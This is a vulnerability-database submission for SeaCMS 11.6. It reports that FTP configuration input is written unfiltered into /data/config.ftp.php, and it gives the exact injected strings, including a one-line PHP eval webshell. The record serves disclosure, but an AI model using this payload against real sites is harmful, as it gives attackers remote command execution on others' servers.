| Title | Seacms-v11.6 FTP command execution vulnerability |
|---|
| Description | A command execution vulnerability that can be classified as serious has been found. You can insert commands into the forwarding message at the specified FTP location to obtain the webshell. This vulnerability will seriously threaten the security of the background system.
Use burp to capture packets at FTP, insert "edit_ {phpinfo()}=300&" after&, and then forward the message.After forwarding, you can refresh the page or directly access the /data/config.ftp.php file in the root directory. If you write a sentence, the trojan will insert the edit___ {@ eval ($_POST [a])}=300& to get the webshell.The received user data is directly written to the php file without filtering, resulting in command execution. |
|---|
| Source | ⚠️ https://github.com/jidle123/Seacms-v11.6/issues/1 |
|---|
| User | jidle (UID 41297) |
|---|
| Submission | 02/18/2023 05:38 (3 years ago) |
|---|
| Moderation | 02/22/2023 18:46 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221630 [SeaCMS 11.6 Picture Management /data/config.ftp.php deserialization] |
|---|
| Points | 20 |
|---|